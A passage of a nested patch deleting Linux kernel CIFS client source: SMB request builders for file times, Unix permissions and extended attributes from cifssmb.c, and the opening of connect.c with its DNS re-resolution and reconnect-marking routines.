+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO2);
+-	else
+-		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	memcpy(data_offset, data, sizeof(FILE_BASIC_INFO));
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "SetPathInfo (times) returned %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto SetTimesRetry;
+-
+-	if (rc == -EOPNOTSUPP)
+-		return CIFSSMBSetPathInfoFB(xid, tcon, fileName, data,
+-					    nls_codepage, cifs_sb);
+-
+-	return rc;
+-}
+-
+-static void
+-cifs_fill_unix_set_info(FILE_UNIX_BASIC_INFO *data_offset,
+-			const struct cifs_unix_set_info_args *args)
+-{
+-	u64 uid = NO_CHANGE_64, gid = NO_CHANGE_64;
+-	u64 mode = args->mode;
+-
+-	if (uid_valid(args->uid))
+-		uid = from_kuid(&init_user_ns, args->uid);
+-	if (gid_valid(args->gid))
+-		gid = from_kgid(&init_user_ns, args->gid);
+-
+-	/*
+-	 * Samba server ignores set of file size to zero due to bugs in some
+-	 * older clients, but we should be precise - we use SetFileSize to
+-	 * set file size and do not want to truncate file size to zero
+-	 * accidentally as happened on one Samba server beta by putting
+-	 * zero instead of -1 here
+-	 */
+-	data_offset->EndOfFile = cpu_to_le64(NO_CHANGE_64);
+-	data_offset->NumOfBytes = cpu_to_le64(NO_CHANGE_64);
+-	data_offset->LastStatusChange = cpu_to_le64(args->ctime);
+-	data_offset->LastAccessTime = cpu_to_le64(args->atime);
+-	data_offset->LastModificationTime = cpu_to_le64(args->mtime);
+-	data_offset->Uid = cpu_to_le64(uid);
+-	data_offset->Gid = cpu_to_le64(gid);
+-	/* better to leave device as zero when it is  */
+-	data_offset->DevMajor = cpu_to_le64(MAJOR(args->device));
+-	data_offset->DevMinor = cpu_to_le64(MINOR(args->device));
+-	data_offset->Permissions = cpu_to_le64(mode);
+-
+-	if (S_ISREG(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_FILE);
+-	else if (S_ISDIR(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_DIR);
+-	else if (S_ISLNK(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_SYMLINK);
+-	else if (S_ISCHR(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_CHARDEV);
+-	else if (S_ISBLK(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_BLOCKDEV);
+-	else if (S_ISFIFO(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_FIFO);
+-	else if (S_ISSOCK(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_SOCKET);
+-}
+-
+-int
+-CIFSSMBUnixSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const struct cifs_unix_set_info_args *args,
+-		       u16 fid, u32 pid_of_opener)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	char *data_offset;
+-	int rc = 0;
+-	u16 params, param_offset, offset, byte_count, count;
+-
+-	cifs_dbg(FYI, "Set Unix Info (via SetFileInfo)\n");
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	data_offset = (char *)pSMB +
+-			offsetof(struct smb_hdr, Protocol) + offset;
+-
+-	count = sizeof(FILE_UNIX_BASIC_INFO);
+-
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->Fid = fid;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_BASIC);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	cifs_fill_unix_set_info((FILE_UNIX_BASIC_INFO *)data_offset, args);
+-
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in Set Time (SetFileInfo) = %d\n",
+-			 rc);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBUnixSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const char *file_name,
+-		       const struct cifs_unix_set_info_args *args,
+-		       const struct nls_table *nls_codepage, int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	FILE_UNIX_BASIC_INFO *data_offset;
+-	__u16 params, param_offset, offset, count, byte_count;
+-
+-	cifs_dbg(FYI, "In SetUID/GID/Mode\n");
+-setPermsRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, file_name,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, file_name);
+-	}
+-
+-	params = 6 + name_len;
+-	count = sizeof(FILE_UNIX_BASIC_INFO);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (FILE_UNIX_BASIC_INFO *)((char *) pSMB + offset + 4);
+-	memset(data_offset, 0, count);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_BASIC);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-
+-	cifs_fill_unix_set_info(data_offset, args);
+-
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "SetPathInfo (perms) returned %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto setPermsRetry;
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_XATTR
+-/*
+- * Do a path-based QUERY_ALL_EAS call and parse the result. This is a common
+- * function used by listxattr and getxattr type calls. When ea_name is set,
+- * it looks for that attribute name and stuffs that value into the EAData
+- * buffer. When ea_name is NULL, it stuffs a list of attribute names into the
+- * buffer. In both cases, the return value is either the length of the
+- * resulting data or a negative error code. If EAData is a NULL pointer then
+- * the data isn't copied to it, but the length is returned.
+- */
+-ssize_t
+-CIFSSMBQAllEAs(const unsigned int xid, struct cifs_tcon *tcon,
+-		const unsigned char *searchName, const unsigned char *ea_name,
+-		char *EAData, size_t buf_size,
+-		struct cifs_sb_info *cifs_sb)
+-{
+-		/* BB assumes one setup word */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int remap = cifs_remap(cifs_sb);
+-	struct nls_table *nls_codepage = cifs_sb->local_nls;
+-	int rc = 0;
+-	int bytes_returned;
+-	int list_len;
+-	struct fealist *ea_response_data;
+-	struct fea *temp_fea;
+-	char *temp_ptr;
+-	char *end_of_smb;
+-	__u16 params, byte_count, data_offset;
+-	unsigned int ea_name_len = ea_name ? strlen(ea_name) : 0;
+-
+-	cifs_dbg(FYI, "In Query All EAs path %s\n", searchName);
+-QAllEAsRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		list_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
+-				       PATH_MAX, nls_codepage, remap);
+-		list_len++;	/* trailing null */
+-		list_len *= 2;
+-	} else {
+-		list_len = copy_path_name(pSMB->FileName, searchName);
+-	}
+-
+-	params = 2 /* level */ + 4 /* reserved */ + list_len /* includes NUL */;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_INFO_QUERY_ALL_EAS);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QueryAllEAs = %d\n", rc);
+-		goto QAllEAsOut;
+-	}
+-
+-
+-	/* BB also check enough total bytes returned */
+-	/* BB we need to improve the validity checking
+-	of these trans2 responses */
+-
+-	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-	if (rc || get_bcc(&pSMBr->hdr) < 4) {
+-		rc = -EIO;	/* bad smb */
+-		goto QAllEAsOut;
+-	}
+-
+-	/* check that length of list is not more than bcc */
+-	/* check that each entry does not go beyond length
+-	   of list */
+-	/* check that each element of each entry does not
+-	   go beyond end of list */
+-	/* validate_trans2_offsets() */
+-	/* BB check if start of smb + data_offset > &bcc+ bcc */
+-
+-	data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-	ea_response_data = (struct fealist *)
+-				(((char *) &pSMBr->hdr.Protocol) + data_offset);
+-
+-	list_len = le32_to_cpu(ea_response_data->list_len);
+-	cifs_dbg(FYI, "ea length %d\n", list_len);
+-	if (list_len <= 8) {
+-		cifs_dbg(FYI, "empty EA list returned from server\n");
+-		/* didn't find the named attribute */
+-		if (ea_name)
+-			rc = -ENODATA;
+-		goto QAllEAsOut;
+-	}
+-
+-	/* make sure list_len doesn't go past end of SMB */
+-	end_of_smb = (char *)pByteArea(&pSMBr->hdr) + get_bcc(&pSMBr->hdr);
+-	if ((char *)ea_response_data + list_len > end_of_smb) {
+-		cifs_dbg(FYI, "EA list appears to go beyond SMB\n");
+-		rc = -EIO;
+-		goto QAllEAsOut;
+-	}
+-
+-	/* account for ea list len */
+-	list_len -= 4;
+-	temp_fea = ea_response_data->list;
+-	temp_ptr = (char *)temp_fea;
+-	while (list_len > 0) {
+-		unsigned int name_len;
+-		__u16 value_len;
+-
+-		list_len -= 4;
+-		temp_ptr += 4;
+-		/* make sure we can read name_len and value_len */
+-		if (list_len < 0) {
+-			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
+-			rc = -EIO;
+-			goto QAllEAsOut;
+-		}
+-
+-		name_len = temp_fea->name_len;
+-		value_len = le16_to_cpu(temp_fea->value_len);
+-		list_len -= name_len + 1 + value_len;
+-		if (list_len < 0) {
+-			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
+-			rc = -EIO;
+-			goto QAllEAsOut;
+-		}
+-
+-		if (ea_name) {
+-			if (ea_name_len == name_len &&
+-			    memcmp(ea_name, temp_ptr, name_len) == 0) {
+-				temp_ptr += name_len + 1;
+-				rc = value_len;
+-				if (buf_size == 0)
+-					goto QAllEAsOut;
+-				if ((size_t)value_len > buf_size) {
+-					rc = -ERANGE;
+-					goto QAllEAsOut;
+-				}
+-				memcpy(EAData, temp_ptr, value_len);
+-				goto QAllEAsOut;
+-			}
+-		} else {
+-			/* account for prefix user. and trailing null */
+-			rc += (5 + 1 + name_len);
+-			if (rc < (int) buf_size) {
+-				memcpy(EAData, "user.", 5);
+-				EAData += 5;
+-				memcpy(EAData, temp_ptr, name_len);
+-				EAData += name_len;
+-				/* null terminate name */
+-				*EAData = 0;
+-				++EAData;
+-			} else if (buf_size == 0) {
+-				/* skip copy - calc size only */
+-			} else {
+-				/* stop before overrun buffer */
+-				rc = -ERANGE;
+-				break;
+-			}
+-		}
+-		temp_ptr += name_len + 1 + value_len;
+-		temp_fea = (struct fea *)temp_ptr;
+-	}
+-
+-	/* didn't find the named attribute */
+-	if (ea_name)
+-		rc = -ENODATA;
+-
+-QAllEAsOut:
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto QAllEAsRetry;
+-
+-	return (ssize_t)rc;
+-}
+-
+-int
+-CIFSSMBSetEA(const unsigned int xid, struct cifs_tcon *tcon,
+-	     const char *fileName, const char *ea_name, const void *ea_value,
+-	     const __u16 ea_value_len, const struct nls_table *nls_codepage,
+-	     struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb_com_transaction2_spi_req *pSMB = NULL;
+-	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
+-	struct fealist *parm_data;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, byte_count, offset, count;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In SetEA\n");
+-SetEARetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fileName);
+-	}
+-
+-	params = 6 + name_len;
+-
+-	/* done calculating parms using name_len of file name,
+-	now use name_len to calculate length of ea name
+-	we are going to create in the inode xattrs */
+-	if (ea_name == NULL)
+-		name_len = 0;
+-	else
+-		name_len = strnlen(ea_name, 255);
+-
+-	count = sizeof(*parm_data) + ea_value_len + name_len;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	pSMB->InformationLevel =
+-		cpu_to_le16(SMB_SET_FILE_EA);
+-
+-	parm_data = (void *)pSMB + offsetof(struct smb_hdr, Protocol) + offset;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	parm_data->list_len = cpu_to_le32(count);
+-	parm_data->list[0].EA_flags = 0;
+-	/* we checked above that name len is less than 255 */
+-	parm_data->list[0].name_len = (__u8)name_len;
+-	/* EA names are always ASCII */
+-	if (ea_name)
+-		strncpy(parm_data->list[0].name, ea_name, name_len);
+-	parm_data->list[0].name[name_len] = 0;
+-	parm_data->list[0].value_len = cpu_to_le16(ea_value_len);
+-	/* caller ensures that ea_value_len is less than 64K but
+-	we need to ensure that it fits within the smb */
+-
+-	/*BB add length check to see if it would fit in
+-	     negotiated SMB buffer size BB */
+-	/* if (ea_value_len > buffer_size - 512 (enough for header)) */
+-	if (ea_value_len)
+-		memcpy(parm_data->list[0].name+name_len+1,
+-		       ea_value, ea_value_len);
+-
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "SetPathInfo (EA) returned %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto SetEARetry;
+-
+-	return rc;
+-}
+-#endif
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+deleted file mode 100644
+index 935fe198a4baf..0000000000000
+--- a/fs/cifs/connect.c
++++ /dev/null
+@@ -1,4754 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2011
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/net.h>
+-#include <linux/string.h>
+-#include <linux/sched/mm.h>
+-#include <linux/sched/signal.h>
+-#include <linux/list.h>
+-#include <linux/wait.h>
+-#include <linux/slab.h>
+-#include <linux/pagemap.h>
+-#include <linux/ctype.h>
+-#include <linux/utsname.h>
+-#include <linux/mempool.h>
+-#include <linux/delay.h>
+-#include <linux/completion.h>
+-#include <linux/kthread.h>
+-#include <linux/pagevec.h>
+-#include <linux/freezer.h>
+-#include <linux/namei.h>
+-#include <linux/uuid.h>
+-#include <linux/uaccess.h>
+-#include <asm/processor.h>
+-#include <linux/inet.h>
+-#include <linux/module.h>
+-#include <keys/user-type.h>
+-#include <net/ipv6.h>
+-#include <linux/parser.h>
+-#include <linux/bvec.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "ntlmssp.h"
+-#include "nterr.h"
+-#include "rfc1002pdu.h"
+-#include "fscache.h"
+-#include "smb2proto.h"
+-#include "smbdirect.h"
+-#include "dns_resolve.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-#include "fs_context.h"
+-#include "cifs_swn.h"
+-
+-extern mempool_t *cifs_req_poolp;
+-extern bool disable_legacy_dialects;
+-
+-/* FIXME: should these be tunable? */
+-#define TLINK_ERROR_EXPIRE	(1 * HZ)
+-#define TLINK_IDLE_EXPIRE	(600 * HZ)
+-
+-/* Drop the connection to not overload the server */
+-#define NUM_STATUS_IO_TIMEOUT   5
+-
+-struct mount_ctx {
+-	struct cifs_sb_info *cifs_sb;
+-	struct smb3_fs_context *fs_ctx;
+-	unsigned int xid;
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	struct cifs_ses *root_ses;
+-	uuid_t mount_id;
+-	char *origin_fullpath, *leaf_fullpath;
+-#endif
+-};
+-
+-static int ip_connect(struct TCP_Server_Info *server);
+-static int generic_ip_connect(struct TCP_Server_Info *server);
+-static void tlink_rb_insert(struct rb_root *root, struct tcon_link *new_tlink);
+-static void cifs_prune_tlinks(struct work_struct *work);
+-
+-/*
+- * Resolve hostname and set ip addr in tcp ses. Useful for hostnames that may
+- * get their ip addresses changed at some point.
+- *
+- * This should be called with server->srv_mutex held.
+- */
+-static int reconn_set_ipaddr_from_hostname(struct TCP_Server_Info *server)
+-{
+-	int rc;
+-	int len;
+-	char *unc, *ipaddr = NULL;
+-	time64_t expiry, now;
+-	unsigned long ttl = SMB_DNS_RESOLVE_INTERVAL_DEFAULT;
+-
+-	if (!server->hostname)
+-		return -EINVAL;
+-
+-	/* if server hostname isn't populated, there's nothing to do here */
+-	if (server->hostname[0] == '\0')
+-		return 0;
+-
+-	len = strlen(server->hostname) + 3;
+-
+-	unc = kmalloc(len, GFP_KERNEL);
+-	if (!unc) {
+-		cifs_dbg(FYI, "%s: failed to create UNC path\n", __func__);
+-		return -ENOMEM;
+-	}
+-	scnprintf(unc, len, "\\\\%s", server->hostname);
+-
+-	rc = dns_resolve_server_name_to_ip(unc, &ipaddr, &expiry);
+-	kfree(unc);
+-
+-	if (rc < 0) {
+-		cifs_dbg(FYI, "%s: failed to resolve server part of %s to IP: %d\n",
+-			 __func__, server->hostname, rc);
+-		goto requeue_resolve;
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	rc = cifs_convert_address((struct sockaddr *)&server->dstaddr, ipaddr,
+-				  strlen(ipaddr));
+-	spin_unlock(&server->srv_lock);
+-	kfree(ipaddr);
+-
+-	/* rc == 1 means success here */
+-	if (rc) {
+-		now = ktime_get_real_seconds();
+-		if (expiry && expiry > now)
+-			/*
+-			 * To make sure we don't use the cached entry, retry 1s
+-			 * after expiry.
+-			 */
+-			ttl = max_t(unsigned long, expiry - now, SMB_DNS_RESOLVE_INTERVAL_MIN) + 1;
+-	}
+-	rc = !rc ? -1 : 0;
+-
+-requeue_resolve:
+-	cifs_dbg(FYI, "%s: next dns resolution scheduled for %lu seconds in the future\n",
+-		 __func__, ttl);
+-	mod_delayed_work(cifsiod_wq, &server->resolve, (ttl * HZ));
+-
+-	return rc;
+-}
+-
+-static void smb2_query_server_interfaces(struct work_struct *work)
+-{
+-	int rc;
+-	struct cifs_tcon *tcon = container_of(work,
+-					struct cifs_tcon,
+-					query_interfaces.work);
+-
+-	/*
+-	 * query server network interfaces, in case they change
+-	 */
+-	rc = SMB3_request_interfaces(0, tcon, false);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: failed to query server interfaces: %d\n",
+-				__func__, rc);
+-	}
+-
+-	queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
+-			   (SMB_INTERFACE_POLL_INTERVAL * HZ));
+-}
+-
+-static void cifs_resolve_server(struct work_struct *work)
+-{
+-	int rc;
+-	struct TCP_Server_Info *server = container_of(work,
+-					struct TCP_Server_Info, resolve.work);
+-
+-	cifs_server_lock(server);
+-
+-	/*
+-	 * Resolve the hostname again to make sure that IP address is up-to-date.
+-	 */
+-	rc = reconn_set_ipaddr_from_hostname(server);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: failed to resolve hostname: %d\n",
+-				__func__, rc);
+-	}
+-
+-	cifs_server_unlock(server);
+-}
+-
+-/*
+- * Update the tcpStatus for the server.
+- * This is used to signal the cifsd thread to call cifs_reconnect
+- * ONLY cifsd thread should call cifs_reconnect. For any other
+- * thread, use this function
+- *
+- * @server: the tcp ses for which reconnect is needed
+- * @all_channels: if this needs to be done for all channels
+- */
+-void
+-cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
+-				bool all_channels)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	int i;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	spin_lock(&pserver->srv_lock);
+-	if (!all_channels) {
+-		pserver->tcpStatus = CifsNeedReconnect;
+-		spin_unlock(&pserver->srv_lock);
+-		return;
+-	}
+-	spin_unlock(&pserver->srv_lock);
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		spin_lock(&ses->chan_lock);
+-		for (i = 0; i < ses->chan_count; i++) {
+-			spin_lock(&ses->chans[i].server->srv_lock);
+-			ses->chans[i].server->tcpStatus = CifsNeedReconnect;
+-			spin_unlock(&ses->chans[i].server->srv_lock);
+-		}
+-		spin_unlock(&ses->chan_lock);
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-}
+-
+-/*
+- * Mark all sessions and tcons for reconnect.
+- * IMPORTANT: make sure that this gets called only from
+- * cifsd thread. For any other thread, use
+- * cifs_signal_cifsd_for_reconnect
+- *
+- * @server: the tcp ses for which reconnect is needed
+- * @server needs to be previously set to CifsNeedReconnect.
+- * @mark_smb_session: whether even sessions need to be marked
+- */
+-void
+-cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+-				      bool mark_smb_session)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses, *nses;
+-	struct cifs_tcon *tcon;
+-
+-	/*
+-	 * before reconnecting the tcp session, mark the smb session (uid) and the tid bad so they
+-	 * are not used until reconnected.
+-	 */
+-	cifs_dbg(FYI, "%s: marking necessary sessions and tcons for reconnect\n", __func__);
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry_safe(ses, nses, &pserver->smb_ses_list, smb_ses_list) {
+-		/* check if iface is still active */
+-		if (!cifs_chan_is_iface_active(ses, server))
+-			cifs_chan_update_iface(ses, server);
+-
+-		spin_lock(&ses->chan_lock);
+-		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
+-			spin_unlock(&ses->chan_lock);
+-			continue;
+-		}
+-
+-		if (mark_smb_session)
+-			CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses);
+-		else
+-			cifs_chan_set_need_reconnect(ses, server);
+-
+-		cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
+-			 __func__, ses->chans_need_reconnect);
+-
+-		/* If all channels need reconnect, then tcon needs reconnect */
+-		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
+-			spin_unlock(&ses->chan_lock);
+-			continue;
+-		}
+-		spin_unlock(&ses->chan_lock);
+-
+-		spin_lock(&ses->ses_lock);
+-		ses->ses_status = SES_NEED_RECON;
+-		spin_unlock(&ses->ses_lock);
+-
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			tcon->need_reconnect = true;
+-			spin_lock(&tcon->tc_lock);
+-			tcon->status = TID_NEED_RECON;
+-			spin_unlock(&tcon->tc_lock);
+-		}
+-		if (ses->tcon_ipc) {
+-			ses->tcon_ipc->need_reconnect = true;
+-			spin_lock(&ses->tcon_ipc->tc_lock);
+-			ses->tcon_ipc->status = TID_NEED_RECON;
+-			spin_unlock(&ses->tcon_ipc->tc_lock);
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-}
+-
+-static void
+-cifs_abort_connection(struct TCP_Server_Info *server)
+-{
+-	struct mid_q_entry *mid, *nmid;
+-	struct list_head retry_list;
+-
+-	server->maxBuf = 0;
+-	server->max_read = 0;
+-
+-	/* do not want to be sending data on a socket we are freeing */
